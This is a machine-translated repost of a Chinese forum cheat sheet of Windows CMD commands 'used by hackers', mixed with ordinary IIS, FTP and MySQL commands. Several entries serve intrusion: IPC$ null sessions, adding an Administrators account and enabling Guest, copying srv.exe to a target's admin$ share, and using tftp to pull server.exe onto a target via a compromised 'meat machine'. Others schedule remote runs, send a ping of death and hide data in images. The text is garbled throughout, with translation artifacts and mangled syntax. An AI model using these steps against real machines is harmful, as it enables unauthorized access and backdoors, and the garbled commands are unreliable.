Some of the CMD commands used by hackers

Turn from: http://topic.csdn.net/u/20110417/03/85f52649-064f-46ad-b466-f9a4c154e29b.html?seed=2023046095&r= 75217708#r_75217708

NET use $ ">\\ip\ipc$Content$nbsp;" "/USER:" Establish an IPC NULL link
NET use $ ">\\ip\ipc$Content$nbsp;" Password "/user: User name" establish IPC non-null link
NET use H: $ ">\\ip\c$Content$nbsp;" Password "/user: username" Direct login after mapping each other C: to local for H:
NET use H: $ >\\ip\c$Content$nbsp; mapping each other after landing C: to local for H:
NET use $ ">\\ip\ipc$content$nbsp;/del Delete IPC links
NET use H:/del to remove mappings to map each other to the local H:
NET user username password/add set up users
NET user Guest/active:yes activate Guest user
NET user to see which users
NET user account name view the properties of the account
net localgroup Administrators user name/add Add "users" to the administrator to have administrator privileges, note: After the administrator, add s to the plural
net start to see which services are turned on
Net start service name (such as: net start Telnet, net start schedule)
NET stop service name stops a service
NET time \ Target IP View each other
NET time \ \ target Ip/set set the local computer time synchronization with the destination IP host, plus the parameter/yes to cancel the acknowledgment information
NET view to see which shares are open in the local LAN
NET view \\ip see which shares are open on each other's local area network
NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text information" sends messages to each other
NET ver network connection types and information in use within the LAN
NET share to view locally opened shares
NET share ipc$content$nbsp; open ipc$ Share
net share Ipc$content$nbsp;/del Delete ipc$ share
net share C$content$nbsp;/del Delete c: share
NET user Guest 12345 login with guest user to change password to 12345
NET password Password change system login password
Netstat-a See which ports are turned on, commonly used Netstat-an
Netstat-n View the network connection of the port, commonly used Netstat-an
Netstat-v View work in progress
NETSTAT-P protocol Name Example: Netstat-p TCQ/IP View the usage of a protocol (see TCP/IP protocol usage)
Netstat-s View all protocol usage in use
Nbtstat-a IP each other 136 to 139 if one of the ports is opened, you can view each other's most recent user name (03 before the username)-Note: parameter-A is capitalized
Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set the time-out interval.
Ping IP (or domain name) to the other host to send the default size of 32 bytes of data, parameters: "-l[space] packet size"; "-N Send Data Count"; "T" means ping all the time.
PING-T-l 65550 ip death ping (send a file larger than 64K and ping is ping to death)
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) To view the local IP address, ipconfig the available parameter "/all" to display all configuration information
TLIST-T Displays the process as a tree row and column table (additional tools for the system, default is not installed, within the Support/tools folder of the installation directory)
Kill-f the process name with the-f parameter to force the end of a process (for the system's additional tools, default is not installed, in the Support/tools folder of the installation directory)
Del-f file names with the-f parameter can delete read-only files,/ar,/ah,/as,/AA, respectively, to delete read-only, hidden, system, archive,/a-r,/a-h,/a-s,/a-a means to delete files other than read-only, hidden, system, archive. For example, "Del/ar *.*" means to delete all read-only files under the current directory, and "Del/a-s *.*" means to delete all files except the system files in the current directory
DEL/S/q directory or use: rmdir/s/q directory/S to delete all subdirectories and files in the directory and directory. Use parameter/q to cancel the system confirmation when the delete operation is removed. (two command functions the same)
The move letter \ path \ file name to be moved stores the path of the moving file, moves the file name, and/y The prompt to cancel the confirmation that the mobile directory exists with the same file.
FC One.txt Two.txt > 3st.txt compares two files and outputs differences to 3st.txt files, ">" and "> >" are redirect commands
An at ID number to open a registered scheduled task
At/delete Stop all scheduled Tasks,/yes with parameters without confirmation and stop directly
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At \\IP time program name (or a command)/R run the other program at some point and restart the computer
Finger username @host See which users have recently logged in
Telnet IP port remote and login server, default port is 23
Open IP connection to IP (the command after Telnet login)
Telnet on this computer, type telnet directly into the native Telnet
Copy path \ filename 1 path \ filename 2/y copy file 1 to the specified directory as file 2, with parameter/y Cancel confirmation you want to overwrite an existing directory file
Copy C:\srv.exe $ ">\\ip\admin$Content$nbsp; Copy Local c:\srv.exe to each other under admin
Cppy 1st.jpg/b+2st.txt/a 3st.jpg will 2st.txt content hiding in 1st.jpg to generate new files, Note: 3st.jpg file header to empty three rows, parameters:/b refers to binary files,/a refers to the 2st.txt format file
Copy $\svv.exe ">\\ip\admin$\svv.exe C:\ Or: Copy\\ip\admin$\*.* copy srv.exe files (all files) under admini$ share to local C:
xcopy copy files and directory trees to the file or directory tree destination address \ Directory name, with parameter/y will not prompt overwrite same file
Tftp-i own IP (with a meat machine as a springboard when this with the meat machine IP) get Server.exe c:\server.exe login, the "IP" Server.exe download to the target host C:\server.exe parameters:-I refers to the binary mode of transmission, such as the transfer of EXE file, if not plus-I in ASCII mode (transfer text file mode) for transmission
Tftp-i each other IP put c:\server.exe login, upload local c:\server.exe to host
The FTP IP port is used to upload files to the server or file operations, with the default port of 21. Bin refers to binary transfer (executable file in); Default to ASCII format transfer (text file)
[Paging]
Route print shows IP routing, will mainly display network address network addres, subnet mask netmask, gateway address Gateway Addres, interface address interface
ARP viewing and processing ARP cache, ARP is the meaning of name resolution, responsible for the resolution of an IP to a physical MAC address. ARP-A will show all the information
Start Program name or command/max or/min new window opens and maximizes (minimizes) running a program or command
Mem View CPU Usage
attrib file name (directory name) to view the properties of a file (directory)
attrib filename-a-r-s-h or +a +r +s +h Remove (add) archive of a file, read only, system, hide attributes, or add as a property with +
Dir view files, parameters:/q display files and directories belong to the system which user,/T:C display file creation time,/t:a display file last accessed time,/t:w last modified time
date/t, time/t Use this parameter that is "date/t", "time/t" will display only the current date and time, without having to enter a new date and time
Set Specify environment variable name = character to assign to variable set environment variable
Set shows all current environment variables
Set P (or other character) displays all environment variables that are currently beginning with the character P (or other character)
Pause suspends the batch program and displays: Press any key to continue ....
If conditional processing is performed in a batch program (more on See if command and variable)
Goto label directs cmd.exe to tagged rows in a batch program (the label must be a single line with a colon, for example: ": Start" tab)
The call path \ batch file name invokes another batch program from the batch program (see more details called/?)
For executing a specific command for each file in a set of files (see for command and variable for more)
echo on or off turns echo on or off and displays the current ECHO setting only with echo without arguments
The echo message displays information on the screen
Echo Information >> pass.txt saves "information" to a pass.txt file
findstr "Hello" aa.txt find string in aa.txt file Hello
Find file name look for a file
Title Name change cmd window title name
The color color value sets the cmd console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = aqua, 4 = red, 5= purple, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= light green, b= pale green, c= red, d= light purple, e= yellowish, f= bright white
Prompt name change cmd.exe display command prompt (change c:\, d:\ unification to: entsky\)
Print file name printing text file
Ver display version information in a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name)
Format Letter/fs: Type format disk, type: FAT, FAT32, NTFS, Example: Format D:/fs:ntfs
MD Directory Name creation directory
Replace source file to replace the file's directory replacement file
ren original filename New file name rename file name
Tree Displays the table of contents in a TreeView, with the parameter-f lists the name of the file in the first folder
Type filename Displays the contents of a text file
More file name display output file by screen
Doskey the command to be locked = character
Doskey to unlock the command = lock command for DOS (edit the command line, recall the Win2K command, and create a macro). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir); Unlock: Doskey dir=
Taskmgr pull up the task Manager
chkdsk/f d: Check disk D and Display status reports, add parameter/F, and Repair errors on the disk
tlntadmn telnt service admn, type tlntadmn option 3, and then select 8 to change the Telnet service default port 23 to any other port
Exit exits the Cmd.exe program or currently, using the parameter/b is to exit the current batch script instead of the Cmd.exe
The file name of the path path \ Executable file sets a path for the executable file.
CMD starts a win2k command interpretation window. Parameters:/eff,/en off, open command extensions; see cmd for more details?
REGEDIT/S registry File name Import registry, parameter/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
The cacls filename parameter displays or modifies the File access control List (ACL)--for NTFS format. Parameters:/d user name: Set to deny access to a user;/p user name: Perm replaces the access rights of the specified user;/g user name: Perm gives the specified user access rights; Perm can be: N None, R read, W write, C Change (write), F complete control; Example: cacls D:\te ST.TXT/D pub set D:\test.txt refused pub user access.
cacls file name to view a list of Access user rights for a file
REM text content Add annotations to batch files
netsh view or change local network configuration
IIS Service Command:
Iisreset/reboot reboot the Win2K computer (but the system will be prompted to restart the information)
Iisreset/start or stop (stops) all Internet services
Iisreset/restart stop and then restart all Internet services
Iisreset/status Show all Internet service status
Iisreset/enable or disable enable (disable) Restart of Internet services on the local system
Iisreset/rebootonerror when the Internet service is started, stopped, or restarted, it will reboot if an error occurs
Iisreset/noforce If Internet services cannot be stopped, Internet services will not be forced to terminate
Iisreset/timeout Val still does not stop the Internet service when it reaches more than (seconds), and if you specify a/rebootonerror parameter, the computer will be powered back on. The preset value is reboot for 20 seconds, stop 60 seconds, and reboot for 0 seconds.
FTP command: (detailed instructions later)
The command line format for FTP is:
Ftp-v-d-i-n-g[Host name]-V displays all the response information for the remote server.
-d use debug mode.
-N Restricts automatic logon of FTP, that is, the. netrc file is not used.
-G cancels the global filename.
Help [command] or. [command] View command description
Bye or quit terminates the host FTP process and exits the FTP admin mode.
PWD lists the current remote host directory
Put or send local file name [uploaded to FileName on host] to transfer a local file to a remote host
Get or recv [remote host filename] [download to local filename] from the remote host to the local host
Mget [Remote-files] receives a batch of files from the remote host to the local host
Mput Local-files sends a batch of files from the local host to the remote host
dir or LS [remote-directory] [local-file] lists the files in the current remote host directory. If a local file is present, the result is written to a local file
ASCII settings transfer files in ASCII (default)
Bin or image settings to transfer files in binary mode
Bell every time you complete a file transfer, alarm prompt
Cdup return to the previous level of directory
Close interrupts the FTP session with the remote server (corresponding to open)
Open Host[port] Establishes a connection to the specified FTP server, which specifies the connection port
Delete deletes files from the remote host
Mdelete [Remote-files] Delete a batch of files
mkdir directory-name Create a directory in the remote host
Rename [from] [to] change the file name in the remote host
RmDir directory-name Deletes a directory in the remote host
Status Displays the current FTP state
system displays remote host systems type
User user-name [Password] [account] re-logged on to the remote host with another user name
Open host [port] re-establish a new connection
Prompt interactive hint mode
MACDEF Define Macros Command
LCD changes the current local host's working directory, if default, go to the current user's home directory
chmod change file permissions on remote hosts
Case when on, copy the filename with the mget command to the local machine and convert all lowercase letters
CD Remote-dir into remote host directory
Cdup into the parent directory of the remote host directory
! Perform interactive shell,exit in the local machine back to the FTP environment, such as!ls*.zip
MYSQL command:
Mysql-h host Address-u username-p password is connected to MySQL; If you have just installed MySQL, Superuser Root does not have a password.
(Example: mysql-h110.110.110.110-uroot-p123456
Note: U and root can be without spaces, others are the same.
Exit out of MySQL
Mysqladmin-u username-p Old password Password new password modify password
Grant SELECT on database. * To User name @ login host identified by \ "Password \"; Add new users. (Note: Unlike the above, the following are the commands in the MySQL environment, followed by a semicolon as the command Terminator)
show databases; Displays a list of databases. Only two databases were initially: MySQL and test. MySQL Library is very important it has MySQL system information, we change the password and new users, is actually using this library to operate.